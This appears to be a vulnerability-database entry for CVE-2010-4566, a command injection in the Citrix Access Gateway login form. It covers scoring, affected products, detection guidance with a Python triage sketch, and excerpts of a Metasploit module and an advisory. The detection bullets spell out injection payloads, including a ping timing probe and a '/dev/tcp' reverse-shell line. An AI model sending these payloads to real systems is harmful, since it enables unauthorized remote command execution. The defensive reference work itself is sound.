CVE-2010-4566
Published: 2011-01-14
Priority P274 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 27.79% (97.8th percentile)
The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | access_gateway | <= 9.2-49.8 | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | access_gateway | — | — |
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | xenserver | — | — |
Detection & IOCs
- Detect shell metacharacter injection in the password field of the web authentication POST request. Look for pipe characters ('|') or ampersands ('&') in the password parameter submitted to the login endpoint.
- Monitor for the POST body pattern containing 'SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit' as a signature of exploit module activity against the Citrix Access Gateway login endpoint.
- Detect timing-based probing: an attacker may inject '| ping -c 10 127.0.0.1' into the password field, causing a ~10-second delay in the authentication response that can be used as a vulnerability check.
- Monitor process execution on the Access Gateway for 'sh -c /usr/local/samba/bin/samedit' spawned by the ntlm_authenticator process, especially with unusual or injected arguments.
- Alert on outbound TCP connections from the Access Gateway process (vpnadmin) to unexpected external hosts, which may indicate a reverse bash shell established via the injected payload '| bash -i >& /dev/tcp/>/> 0>&1 &'.
- The vulnerability is only exploitable when the legacy NT4/NTLM authentication module (ntlm_authenticator) is enabled. Deployments not using this authentication type are not affected.
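The first three checks above, sketched as request-triage logic. This is an added example, not code from the page's sources: the field names `login` and `password` and the 9-second threshold are assumptions, the sample events are constructed, and the metacharacter set goes beyond the '|' and '&' the page names. Legitimate passwords can contain these characters, so a lone metacharacter hit is a triage signal that gains weight when paired with the delay or the static token.

```python
import re
from urllib.parse import parse_qsl

# Static string the page reports in the exploit module's POST body.
MODULE_TOKEN = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit"
# Characters a shell treats specially; the page names '|' and '&'.
SHELL_META = re.compile(r"[|&;`$<>\n]")
PASSWORD_FIELD = "password"  # assumption: the real form field name may differ
SLOW_SECONDS = 9.0           # assumption: page describes a ~10 s delay


def inspect_login(body: str, response_seconds: float) -> list[str]:
    """Return the detection labels that apply to one login POST."""
    findings = []
    if MODULE_TOKEN in body:
        findings.append("module-token")
    # parse_qsl percent-decodes, so %7C and %26 are caught as '|' and '&'.
    fields = dict(parse_qsl(body, keep_blank_values=True))
    password = fields.get(PASSWORD_FIELD, "")
    if SHELL_META.search(password):
        findings.append("shell-metachar")
        # A slow reply alone is noisy; only pair it with a metacharacter hit.
        if response_seconds >= SLOW_SECONDS:
            findings.append("timing-probe")
    return findings


# Constructed sample events: (urlencoded POST body, response time in seconds).
SAMPLES = [
    ("login=alice&password=Spring2011%21", 0.4),
    ("login=bob&password=%7C+ping+-c+10+127.0.0.1", 10.3),
    (MODULE_TOKEN + "&login=x&password=pw%26x", 0.5),
]


def triage(samples):
    """Map each sample to its findings, preserving order."""
    return [inspect_login(body, secs) for body, secs in samples]


if __name__ == "__main__":
    for (body, secs), found in zip(SAMPLES, triage(SAMPLES)):
        print(f"{secs:5.1f}s  {found or 'clean'}")
```

Run this inline at a proxy or WAF rather than over stored logs, so that submitted passwords are never written to disk.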
Citrix
CVE-2010-4566: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authent
vendor_citrix·2011-01-14·CVSS 9.3
Citrix
Citrix Security Bulletin CTX127613
vendor_citrix·CVSS 9.3
CVE References: CVE-2010-4566, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
GHSA
GHSA-9p2p-8259-272j: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9
ghsa_unreviewed·2022-05-17
CVE-2010-4566 [HIGH] GHSA-9p2p-8259-272j: The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9
No detection rules found.
Exploit-DB
Citrix Access Gateway - Command Execution (Metasploit)
exploitdb·2011-03-03
---
##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Citrix Access Gateway Command Execution',
'Description' => %q{
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
met
Exploit-DB
Citrix Access Gateway - Command Injection
exploitdb·2010-12-22·CVSS 9.3
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date: 2010-12-21
Application: Citrix Access Gateway
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity: High
Author: George D. Gal
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- -----------
Metasploit
Citrix Access Gateway Command Execution
metasploit
The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway.
No writeups or analysis indexed.
- http://securityreason.com/securityalert/8119
- http://support.citrix.com/article/CTX127613
- http://www.exploit-db.com/exploits/16916
- http://www.osvdb.org/70099
- http://www.securitytracker.com/id?1024893
- http://www.vsecurity.com/resources/advisory/20101221-1
2011-01-14
Published